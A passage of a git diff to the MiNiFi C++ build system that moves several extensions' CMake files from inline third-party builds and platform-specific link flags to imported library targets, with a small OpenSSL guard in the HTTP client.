-include_directories(../../libminifi/include  ../../libminifi/include/core/yaml  ../../libminifi/include/core  ../../thirdparty/cron  ../../thirdparty/spdlog-20170710/include ../../thirdparty/concurrentqueue ../../thirdparty/yaml-cpp-yaml-cpp-0.5.3/include ${CIVET_THIRDPARTY_ROOT}/include ../../thirdparty/)
+include_directories(../../libminifi/include ../../libminifi/include/core)
 
 if(WIN32)
 	include_directories(../../libminifi/opsys/win)
diff --git a/extensions/aws/CMakeLists.txt b/extensions/aws/CMakeLists.txt
index dc354e2..627b6df 100644
--- a/extensions/aws/CMakeLists.txt
+++ b/extensions/aws/CMakeLists.txt
@@ -22,67 +22,12 @@
 
 file(GLOB SOURCES "*.cpp" "s3/*.cpp" "controllerservices/*.cpp")
 
-set(BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/aws-sdk-cpp")
-set(BYPRODUCT "${CMAKE_CURRENT_BINARY_DIR}/aws-sdk-install/")
-
-
-if(STATIC_BUILD)
-    set(MINIFI_AWS_BUILD_SHARED_LIBS "OFF")
-    set(MINIFI_AWS_UNITY_BUILD "ON")
-else()
-    set(MINIFI_AWS_BUILD_SHARED_LIBS "ON")
-    set(MINIFI_AWS_UNITY_BUILD "OFF")
-endif()
-
-# AWS SDK 1.7.89
-ExternalProject_Add(
-        awssdk-external
-        GIT_REPOSITORY "https://github.com/aws/aws-sdk-cpp.git"
-        GIT_TAG "66666d9437429c28927576cb5c898e490f8c8cf9"
-        EXCLUDE_FROM_ALL TRUE
-        INSTALL_DIR ${BYPRODUCT}
-        CMAKE_ARGS -DBUILD_ONLY=s3
-        -DENABLE_TESTING=OFF
-        -DBUILD_SHARED_LIBS=${MINIFI_AWS_BUILD_SHARED_LIBS}
-        -DENABLE_UNITY_BUILD=${MINIFI_AWS_UNITY_BUILD}
-        -DCMAKE_BUILD_TYPE=RelWithDebInfo
-        -DCMAKE_INSTALL_PREFIX=${BYPRODUCT}
-)
-
-add_library(awssdklib STATIC IMPORTED)
-set_target_properties(awssdklib PROPERTIES IMPORTED_LOCATION "${BYPRODUCT}")
-
-set(AWSSDK_FOUND "YES" CACHE STRING "" FORCE)
-set(AWSSDK_INCLUDE_DIRS "${BYPRODUCT}/include" CACHE STRING "" FORCE)
-set(AWSSDK_LIBRARIES awssdklib CACHE STRING "" FORCE)
-set(AWSSDK_LIBRARY awssdklib CACHE STRING "" FORCE)
-
-include_directories(${AWSSDK_INCLUDE_DIRS})
 add_library(minifi-aws STATIC ${SOURCES})
 
-if(STATIC_BUILD)
-    set(SUFFIX "a")
-else()
-    if(APPLE)
-        set(SUFFIX "dylib")
-    else()
-        set(SUFFIX "so")
-    endif()
-endif()
+target_link_libraries(minifi-aws ${LIBMINIFI})
 
+target_link_libraries(minifi-aws AWS::aws-cpp-sdk-core)
+target_link_libraries(minifi-aws AWS::aws-cpp-sdk-s3)
 
-if (APPLE)
-    if(STATIC_BUILD)
-        target_link_libraries(minifi-aws "-framework CoreFoundation")
-    endif()
-endif()
-
-target_link_libraries(minifi-aws ${BYPRODUCT}lib/libaws-c-common.${SUFFIX})
-target_link_libraries(minifi-aws ${BYPRODUCT}lib/libaws-checksums.${SUFFIX})
-target_link_libraries(minifi-aws ${BYPRODUCT}lib/libaws-c-event-stream.${SUFFIX})
-target_link_libraries(minifi-aws ${BYPRODUCT}lib/libaws-cpp-sdk-core.${SUFFIX})
-target_link_libraries(minifi-aws ${BYPRODUCT}lib/libaws-cpp-sdk-s3.${SUFFIX})
-
-add_dependencies(minifi-aws awssdk-external)
 SET (AWS-EXTENSION minifi-aws PARENT_SCOPE)
-register_extension(minifi-aws)
\ No newline at end of file
+register_extension(minifi-aws)
diff --git a/extensions/bootstrap/CMakeLists.txt b/extensions/bootstrap/CMakeLists.txt
index 40d6b99..c6a7980 100644
--- a/extensions/bootstrap/CMakeLists.txt
+++ b/extensions/bootstrap/CMakeLists.txt
@@ -19,7 +19,7 @@
 
 cmake_minimum_required(VERSION 2.6)
 
-include_directories(../../libminifi/include ../thirdparty/cxxopts/include)
+include_directories(../../libminifi/include)
 
 set(BOOTSTRAP_SOURCES  bootstrap.cpp)
 add_executable(bstrp ${BOOTSTRAP_SOURCES})
diff --git a/extensions/bustache/CMakeLists.txt b/extensions/bustache/CMakeLists.txt
index 2efb586..7cdf351 100644
--- a/extensions/bustache/CMakeLists.txt
+++ b/extensions/bustache/CMakeLists.txt
@@ -21,37 +21,13 @@
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt)
 cmake_minimum_required(VERSION 2.6)
 
-find_package(Boost COMPONENTS system filesystem iostreams REQUIRED)
-include_directories(${Boost_INCLUDE_DIRS})
-
 file(GLOB SOURCES "*.cpp")
 
 add_library(minifi-bustache-extensions STATIC ${SOURCES})
 set_property(TARGET minifi-bustache-extensions PROPERTY POSITION_INDEPENDENT_CODE ON)
-if(THREADS_HAVE_PTHREAD_ARG)
-  target_compile_options(PUBLIC minifi-bustache-extensions "-pthread")
-endif()
-if(CMAKE_THREAD_LIBS_INIT)
-  target_link_libraries(minifi-bustache-extensions "${CMAKE_THREAD_LIBS_INIT}")
-endif()
 
-target_link_libraries(minifi-bustache-extensions ${LIBMINIFI} ${Boost_IOSTREAMS_LIBRARY})
-target_link_libraries(minifi-bustache-extensions ${CMAKE_DL_LIBS})
-target_link_libraries(minifi-bustache-extensions bustache)
-
-if (WIN32)
-    set_target_properties(minifi-bustache-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-bustache-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-bustache-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-bustache-extensions ${LIBMINIFI})
+target_link_libraries(minifi-bustache-extensions BUSTACHE::libbustache)
 
 
 SET (BUSTACHE-EXTENSIONS minifi-bustache-extensions PARENT_SCOPE)
diff --git a/extensions/civetweb/CMakeLists.txt b/extensions/civetweb/CMakeLists.txt
index 52f0f49..72f9de5 100644
--- a/extensions/civetweb/CMakeLists.txt
+++ b/extensions/civetweb/CMakeLists.txt
@@ -21,25 +21,15 @@
 
 include_directories(${CMAKE_SOURCE_DIR}/libminifi/include
                     ${CMAKE_SOURCE_DIR}/libminifi/include/core
-                    ${CMAKE_SOURCE_DIR}/thirdparty/spdlog-20170710/include
-                    ${CMAKE_SOURCE_DIR}/thirdparty/concurrentqueue
-                    ${CMAKE_SOURCE_DIR}/thirdparty/yaml-cpp-yaml-cpp-0.5.3/include
-                    ${CIVET_THIRDPARTY_ROOT}/include
-                    ${CMAKE_SOURCE_DIR}/thirdparty/jsoncpp/include
                     ${CMAKE_SOURCE_DIR}/thirdparty/
                     ./include)
 
-set(BUILD_CIVET_TESTING OFF)
-add_subdirectory(${CIVET_THIRDPARTY_ROOT}
-                 ${CIVET_BINARY_ROOT}
-                 EXCLUDE_FROM_ALL)
-add_dependencies(c-library libressl-portable)
-
 file(GLOB SOURCES  "processors/*.cpp")
 
 add_library(minifi-civet-extensions STATIC ${SOURCES})
 set_property(TARGET minifi-civet-extensions PROPERTY POSITION_INDEPENDENT_CODE ON)
-target_link_libraries(minifi-civet-extensions c-library civetweb-cpp)
+target_link_libraries(minifi-civet-extensions ${LIBMINIFI})
+target_link_libraries(minifi-civet-extensions CIVETWEB::c-library CIVETWEB::civetweb-cpp)
 
 if(THREADS_HAVE_PTHREAD_ARG)
   target_compile_options(PUBLIC minifi-civet-extensions "-pthread")
@@ -49,21 +39,6 @@
 endif()
 
 
-if (WIN32)
-    set_target_properties(minifi-civet-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-civet-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-civet-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
-
 SET (civet-EXTENSIONS minifi-civet-extensions PARENT_SCOPE)
 
 register_extension(minifi-civet-extensions)
diff --git a/extensions/civetweb/tests/CMakeLists.txt b/extensions/civetweb/tests/CMakeLists.txt
index 723c407..f1bdfba 100644
--- a/extensions/civetweb/tests/CMakeLists.txt
+++ b/extensions/civetweb/tests/CMakeLists.txt
@@ -28,29 +28,23 @@
         target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
         target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/http-curl")
         target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/civetweb-1.10/include")
-        target_include_directories(${testfilename} PRIVATE BEFORE ${CURL_INCLUDE_DIRS})
 
-        if (APPLE)
-            target_link_libraries (${testfilename} -Wl,-all_load ${ZLIB_LIBRARIES} ${OPENSSL_LIBRARIES} minifi-civet-extensions minifi-http-curl minifi-standard-processors)
-        elseif (WIN32)
-            target_link_libraries (${testfilename} ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-civet-extensions minifi-http-curl minifi-standard-processors)
-            set_target_properties (${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi-civet-extensions /WHOLEARCHIVE:minifi-http-curl /WHOLEARCHIVE:minifi-standard-processors")
-        else ()
-            target_link_libraries (${testfilename} -Wl,--whole-archive ${ZLIB_LIBRARIES} ${OPENSSL_LIBRARIES} minifi-civet-extensions minifi-http-curl minifi-standard-processors -Wl,--no-whole-archive)
-        endif ()
+        target_wholearchive_library(${testfilename} minifi-civet-extensions)
+        target_wholearchive_library(${testfilename} minifi-http-curl)
+        target_wholearchive_library(${testfilename} minifi-standard-processors)
 
         createTests("${testfilename}")
         target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
         MATH(EXPR CIVETWEB-EXTENSIONS_TEST_COUNT "${CIVETWEB-EXTENSIONS_TEST_COUNT}+1")
         add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
         # Copy test resources
-                add_custom_command(
-                        TARGET "${testfilename}"
-                        POST_BUILD
-                        COMMAND ${CMAKE_COMMAND} -E copy_directory
-                                "${CMAKE_SOURCE_DIR}/extensions/civetweb/tests/resources"
-                                "$<TARGET_FILE_DIR:${testfilename}>/resources"
-                        )
+        add_custom_command(
+            TARGET "${testfilename}"
+            POST_BUILD
+            COMMAND ${CMAKE_COMMAND} -E copy_directory
+                    "${CMAKE_SOURCE_DIR}/extensions/civetweb/tests/resources"
+                    "$<TARGET_FILE_DIR:${testfilename}>/resources"
+            )
     ENDFOREACH()
     message("-- Finished building ${CIVETWEB-EXTENSIONS_TEST_COUNT} civetweb related test file(s)...")
 endif()
diff --git a/extensions/coap/CMakeLists.txt b/extensions/coap/CMakeLists.txt
index 9bfa977..450dbfe 100644
--- a/extensions/coap/CMakeLists.txt
+++ b/extensions/coap/CMakeLists.txt
@@ -33,56 +33,9 @@
   target_link_libraries(minifi-coap "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-  set(BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/extensions/coap")
-  # determine version of GNUTLSs
-  set(BYPRODUCT "${BASE_DIR}/extensions/coap/thirdparty/libcoap-src/.libs/libcoap-2.a")
-  set(DIR "${BASE_DIR}/extensions/coap/thirdparty/libcoap-src")
-  ExternalProject_Add(
-    coap-external
-    GIT_REPOSITORY "https://github.com/obgm/libcoap.git"
-    GIT_TAG "00486a4f46e0278dd24a8ff3411416ff420cde29" 
-    PREFIX "${BASE_DIR}/extensions/coap/thirdparty/libcoap"
-    BUILD_IN_SOURCE true
-    SOURCE_DIR "${DIR}"
-    BUILD_COMMAND make
-    CMAKE_COMMAND ""
-    UPDATE_COMMAND ""
-    INSTALL_COMMAND ${CMAKE_COMMAND}  -E echo "Skipping install step."
-    CONFIGURE_COMMAND ""
-    PATCH_COMMAND ./autogen.sh && ./configure --disable-examples --disable-dtls --disable-tests --disable-documentation
-    STEP_TARGETS build
-    EXCLUDE_FROM_ALL TRUE
-  )
-  add_definitions("-DWITH_POSIX=1")
-  
-  add_library(coaplib STATIC IMPORTED)
-  set_target_properties(coaplib PROPERTIES IMPORTED_LOCATION "${BYPRODUCT}")
-  add_dependencies(coaplib coap-external)
-  set(COAP_FOUND "YES" CACHE STRING "" FORCE)
-  set(COAP_INCLUDE_DIRS "${DIR}/include" CACHE STRING "" FORCE)
-  set(COAP_LIBRARIES coaplib CACHE STRING "" FORCE)
-  set(COAP_LIBRARY coaplib CACHE STRING "" FORCE)
-  set(COAP_LIBRARY coaplib CACHE STRING "" FORCE)
-target_link_libraries(minifi-coap ${CMAKE_DL_LIBS})
-
-include_directories(${COAP_INCLUDE_DIRS})
-
-target_link_libraries (nanofi-coap-c ${COAP_LIBRARIES})
-target_link_libraries (nanofi-coap-c ${HTTP-CURL})
-target_link_libraries (minifi-coap nanofi-coap-c ${COAP_LIBRARIES})
-if (WIN32)
-    set_target_properties(minifi-coap PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-coap PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-coap PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(nanofi-coap-c COAP::libcoap)
+target_link_libraries(minifi-coap ${LIBMINIFI})
+target_link_libraries(minifi-coap nanofi-coap-c COAP::libcoap minifi-http-curl)
 
 SET (COAP-EXTENSION minifi-coap PARENT_SCOPE)
 register_extension(minifi-coap)
diff --git a/extensions/coap/server/CoapServer.cpp b/extensions/coap/server/CoapServer.cpp
index d8cbd7a..9f925de 100644
--- a/extensions/coap/server/CoapServer.cpp
+++ b/extensions/coap/server/CoapServer.cpp
@@ -16,7 +16,6 @@
  * limitations under the License.
  */
 #include "CoapServer.h"
-#include <coap2/utlist.h>
 #include <coap2/coap.h>
 
 namespace org {
diff --git a/extensions/coap/tests/CMakeLists.txt b/extensions/coap/tests/CMakeLists.txt
index 130284c..89ba7af 100644
--- a/extensions/coap/tests/CMakeLists.txt
+++ b/extensions/coap/tests/CMakeLists.txt
@@ -26,10 +26,7 @@
 FOREACH(testfile ${CURL_INTEGRATION_TESTS})
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
-  	target_include_directories(${testfilename} BEFORE PRIVATE ${COAP_INCLUDE_DIRS})
-  	target_include_directories(${testfilename} BEFORE PRIVATE ${CURL_INCLUDE_DIRS})
   	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
-  	target_include_directories(${testfilename} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}/include")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../server")
@@ -44,12 +41,12 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/civetweb/")
 	target_include_directories(${testfilename} BEFORE PRIVATE ./include)
     createTests("${testfilename}")
-    if (APPLE)
-    	target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-coap minifi-civet-extensions minifi-standard-processors)
-	else ()
-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-coap minifi-civet-extensions minifi-standard-processors -Wl,--no-whole-archive)
-  	endif()
-  MATH(EXPR CURL_INT_TEST_COUNT "${CURL_INT_TEST_COUNT}+1")
+	target_wholearchive_library(${testfilename} minifi-coap)
+	target_wholearchive_library(${testfilename} minifi-civet-extensions)
+	target_wholearchive_library(${testfilename} minifi-http-curl)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+
+    MATH(EXPR CURL_INT_TEST_COUNT "${CURL_INT_TEST_COUNT}+1")
 ENDFOREACH()
 
 message("-- Finished building ${CURL_INT_TEST_COUNT} CoAP integration test file(s)...")
diff --git a/extensions/expression-language/CMakeLists.txt b/extensions/expression-language/CMakeLists.txt
index 1876c7e..f70f779 100644
--- a/extensions/expression-language/CMakeLists.txt
+++ b/extensions/expression-language/CMakeLists.txt
@@ -96,7 +96,7 @@
 
 add_flex_bison_dependency(el-scanner el-parser)
 endif()
-include_directories(./ ../../libminifi/include  ../../libminifi/include/core ../../thirdparty/cron ../../thirdparty/spdlog-20170710/include ../../thirdparty/concurrentqueue ../../thirdparty/yaml-cpp-yaml-cpp-0.5.3/include ${CIVET_THIRDPARTY_ROOT}/include ../../thirdparty/)
+include_directories(./ ../../libminifi/include  ../../libminifi/include/core ../../thirdparty/)
 include_directories(common)
 include_directories(impl)
 include_directories(../../thirdparty/date/include)
@@ -117,27 +117,8 @@
 add_library(minifi-expression-language-extensions STATIC ${SOURCES} ${BISON_el-parser_OUTPUTS} ${FLEX_el-scanner_OUTPUTS})
 set_property(TARGET minifi-expression-language-extensions PROPERTY POSITION_INDEPENDENT_CODE ON)
 
-target_link_libraries(minifi-expression-language-extensions minifi tz)
-
-if (NOT DISABLE_CURL)
-	if (NOT CURL_FOUND)
-		find_package(CURL REQUIRED)
-	endif(NOT CURL_FOUND)
-	include_directories(${CURL_INCLUDE_DIRS})
-	target_link_libraries(minifi-expression-language-extensions ${CURL_LIBRARIES})
-endif()
-find_package(OpenSSL REQUIRED)
-include_directories(${OPENSSL_INCLUDE_DIR})
-target_link_libraries(minifi-expression-language-extensions ${CMAKE_DL_LIBS})
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries (minifi-expression-language-extensions ${ZLIB_LIBRARIES})
-
-if (WIN32 AND NOT DISABLE_CURL)
-    set_target_properties(minifi-expression-language-extensions PROPERTIES
-        LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${CURL_LIBRARIES}"
-    )
-endif()
+target_link_libraries(minifi-expression-language-extensions ${LIBMINIFI})
+target_link_libraries(minifi-expression-language-extensions tz RapidJSON CURL::libcurl)
 
 SET (EXPRESSION-LANGUAGE-EXTENSIONS minifi-expression-language-extensions PARENT_SCOPE)
 
diff --git a/extensions/expression-language/noop/CMakeLists.txt b/extensions/expression-language/noop/CMakeLists.txt
index 6424235..7ef550e 100644
--- a/extensions/expression-language/noop/CMakeLists.txt
+++ b/extensions/expression-language/noop/CMakeLists.txt
@@ -19,6 +19,6 @@
 
 message(STATUS "Expression language is disabled; using NoOp implementation")
 file(GLOB SOURCES "*.cpp")
-include_directories(../../../libminifi/include  ../../../libminifi/include/core  ../../../thirdparty/spdlog-20170710/include ../../../thirdparty/concurrentqueue ../../../thirdparty/yaml-cpp-yaml-cpp-0.5.3/include ${CIVET_THIRDPARTY_ROOT}/include ../../../thirdparty/)
+include_directories(../../../libminifi/include  ../../../libminifi/include/core ../../../thirdparty/)
 add_library(minifi-expression-language-extensions STATIC ${SOURCES})
 set_property(TARGET minifi-expression-language-extensions PROPERTY POSITION_INDEPENDENT_CODE ON)
\ No newline at end of file
diff --git a/extensions/expression-language/tests/CMakeLists.txt b/extensions/expression-language/tests/CMakeLists.txt
index 52f01d0..c3ca54f 100644
--- a/extensions/expression-language/tests/CMakeLists.txt
+++ b/extensions/expression-language/tests/CMakeLists.txt
@@ -21,7 +21,7 @@
 file(GLOB EXPRESSION_LANGUAGE_TESTS  "*.cpp")
 
 SET(EXTENSIONS_TEST_COUNT 0)
-if (NOT WIN32)
+if(NOT WIN32)
 	FOREACH(testfile ${EXPRESSION_LANGUAGE_TESTS})
 		get_filename_component(testfilename "${testfile}" NAME_WE)
 		add_executable(${testfilename} "${testfile}")
@@ -33,25 +33,12 @@
 		target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/expression-language")
 		createTests(${testfilename})
 		target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
+		if(NOT DISABLE_CURL)
+			target_link_libraries(${testfilename} CURL::libcurl)
+		endif()
+		target_wholearchive_library(${testfilename} minifi-expression-language-extensions)
+		target_wholearchive_library(${testfilename} minifi-standard-processors)
 
-	
-		if (NOT DISABLE_CURL)
-				target_link_libraries (${testfilename} ${CURL_LIBRARIES})
-		endif()
-		if (WIN32)
-			foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-				if (OPENSSL_LIB MATCHES "\\.lib$" OR OPENSSL_LIB MATCHES "\\.dll$" )
-				message( "Including ${OPENSSL_LIB}")
-				target_link_libraries (${testfilename} ${OPENSSL_LIB})	
-				set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${OPENSSL_LIB}")
-				endif()
-			endforeach()
-			target_link_libraries (${testfilename} minifi-expression-language-extensions minifi-standard-processors)
-		elseif (APPLE)
-			target_link_libraries (${testfilename} -Wl,-all_load minifi-expression-language-extensions minifi-standard-processors)
-		else ()
-			target_link_libraries (${testfilename} -Wl,--whole-archive ${OPENSSL_LIBRARIES} minifi-expression-language-extensions minifi-standard-processors -Wl,--no-whole-archive)
-		endif()
 		MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 		add_test(NAME ${testfilename} COMMAND ${testfilename} WORKING_DIRECTORY ${TEST_DIR})
 	ENDFOREACH()
@@ -74,31 +61,12 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors/processors")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/expression-language")
 	createTests(${testfilename})
-	
-	if (WIN32)
-		foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-			if (OPENSSL_LIB MATCHES "\\.lib$" OR OPENSSL_LIB MATCHES "\\.dll$" )
-			message( "Including ${OPENSSL_LIB}")
-			target_link_libraries (${testfilename} ${OPENSSL_LIB})
-			set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${OPENSSL_LIB}")
-			endif()
-		endforeach()
-		if (NOT DISABLE_CURL)
-		target_link_libraries (${testfilename} ${CURL_LIBRARIES})
-		endif()
-		target_link_libraries (${testfilename} minifi-expression-language-extensions minifi-standard-processors)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi-expression-language-extensions /WHOLEARCHIVE:minifi-standard-processors")
-	elseif (APPLE)
-		if (NOT DISABLE_CURL)
-		target_link_libraries (${testfilename} ${CURL_LIBRARIES})
-		endif(NOT DISABLE_CURL)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-expression-language-extensions minifi-standard-processors)
-	else ()
-		if (NOT DISABLE_CURL)
-		target_link_libraries (${testfilename} ${CURL_LIBRARIES})
-		endif(NOT DISABLE_CURL)
-		target_link_libraries (${testfilename} -Wl,--whole-archive ${OPENSSL_LIBRARIES} minifi-expression-language-extensions minifi-standard-processors -Wl,--no-whole-archive)
+	if(NOT DISABLE_CURL)
+		target_link_libraries(${testfilename} CURL::libcurl)
 	endif()
+	target_wholearchive_library(${testfilename} minifi-expression-language-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${INT_EXTENSIONS_TEST_COUNT}+1")
 ENDFOREACH()
 
diff --git a/extensions/gps/CMakeLists.txt b/extensions/gps/CMakeLists.txt
index 892bff1..25bb816 100644
--- a/extensions/gps/CMakeLists.txt
+++ b/extensions/gps/CMakeLists.txt
@@ -33,21 +33,6 @@
 target_link_libraries(minifi-gps ${LIBMINIFI} )
 target_link_libraries(minifi-gps ${LIBGPS_LIBRARIES})
 
-target_link_libraries(minifi-gps ${CMAKE_DL_LIBS} )
-if (WIN32)
-    set_target_properties(minifi-gps PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-gps PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-gps PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
 
 SET (GPS-EXTENSION minifi-gps PARENT_SCOPE)
 
diff --git a/extensions/http-curl/CMakeLists.txt b/extensions/http-curl/CMakeLists.txt
index 178ce7f..956fc47 100644
--- a/extensions/http-curl/CMakeLists.txt
+++ b/extensions/http-curl/CMakeLists.txt
@@ -17,8 +17,6 @@
 # under the License.
 #
 
-find_package(CURL REQUIRED)
-
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt)
 include_directories(protocols client processors sitetosite)
 
@@ -33,53 +31,9 @@
   target_link_libraries(minifi-http-curl "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-if (CURL_FOUND)
-  include_directories(${CURL_INCLUDE_DIRS})
-  if (WIN32)
-	message("Including ${CURL_LIBRARY} into minifi-http-curl")
-	target_link_libraries (minifi-http-curl ${CURL_LIBRARY})	
-	set_target_properties(minifi-http-curl PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${CURL_LIBRARY}")
-
-	else()
-			target_link_libraries(minifi-http-curl ${CURL_LIBRARIES})
-	endif()
-endif ()
-
-# Include OpenSSL
-set(OPENSSL_USE_STATIC_LIBS TRUE)
-find_package(OpenSSL REQUIRED)
-include_directories(${OPENSSL_INCLUDE_DIR})
-target_link_libraries(minifi-http-curl ${CMAKE_DL_LIBS})
+target_link_libraries(minifi-http-curl ${LIBMINIFI})
+target_link_libraries(minifi-http-curl CURL::libcurl RapidJSON)
 target_link_libraries(minifi-http-curl minifi-civet-extensions)
 
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries (minifi-http-curl ${ZLIB_LIBRARIES})
-if (WIN32)
-
-
-message("${OPENSSL_LIBRARIES}")
-	set (WIN32_ARCHIVES "")
-		foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-		if (WIN32)
-		if (OPENSSL_LIB MATCHES "\\.lib$" OR OPENSSL_LIB MATCHES "\\.dll$" )
-				message( FATAL "Including ${OPENSSL_LIB}")
-		set_target_properties(minifi-http-curl PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${OPENSSL_LIB}")
-		endif()
-	endif()
-	endforeach()
-
-elseif (APPLE)
-	target_link_libraries(minifi-http-curl ${OPENSSL_LIBRARIES})
-    set_target_properties(minifi-http-curl PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-	message("${OPENSSL_LIBRARIES}")
-	foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-		target_link_libraries (minifi-http-curl ${OPENSSL_LIB})
-	endforeach()
-endif ()
-
 SET (HTTP-CURL minifi-http-curl PARENT_SCOPE)
 register_extension(minifi-http-curl)
diff --git a/extensions/http-curl/client/HTTPClient.cpp b/extensions/http-curl/client/HTTPClient.cpp
index 562376d..354d62a 100644
--- a/extensions/http-curl/client/HTTPClient.cpp
+++ b/extensions/http-curl/client/HTTPClient.cpp
@@ -402,11 +402,13 @@
   }
   curl_easy_setopt(http_session, CURLOPT_CAPATH, nullptr);
 #else
+#ifdef OPENSSL_SUPPORT
   curl_easy_setopt(http_session, CURLOPT_SSL_CTX_FUNCTION, &configure_ssl_context);
   curl_easy_setopt(http_session, CURLOPT_SSL_CTX_DATA, static_cast<void*>(ssl_context_service_.get()));
   curl_easy_setopt(http_session, CURLOPT_CAINFO, 0);
   curl_easy_setopt(http_session, CURLOPT_CAPATH, 0);
 #endif
+#endif
 }
 
 bool HTTPClient::isSecure(const std::string &url) {
diff --git a/extensions/http-curl/tests/CMakeLists.txt b/extensions/http-curl/tests/CMakeLists.txt
index 97b53ed..e12e956 100644
--- a/extensions/http-curl/tests/CMakeLists.txt
+++ b/extensions/http-curl/tests/CMakeLists.txt
@@ -25,8 +25,6 @@
 FOREACH(testfile ${CURL_UNIT_TESTS})
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
-  	target_include_directories(${testfilename} BEFORE PRIVATE ${CURL_INCLUDE_DIRS})
-  	target_include_directories(${testfilename} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../")
@@ -38,14 +36,10 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE ./include)
     createTests("${testfilename}")
     target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-    if (APPLE)
-    	target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions minifi-standard-processors)
-	elseif(WIN32)
-		target_link_libraries ("${testfilename}" ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions  minifi-standard-processors)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi-http-curl /WHOLEARCHIVE:minifi-standard-processors")
-	else ()
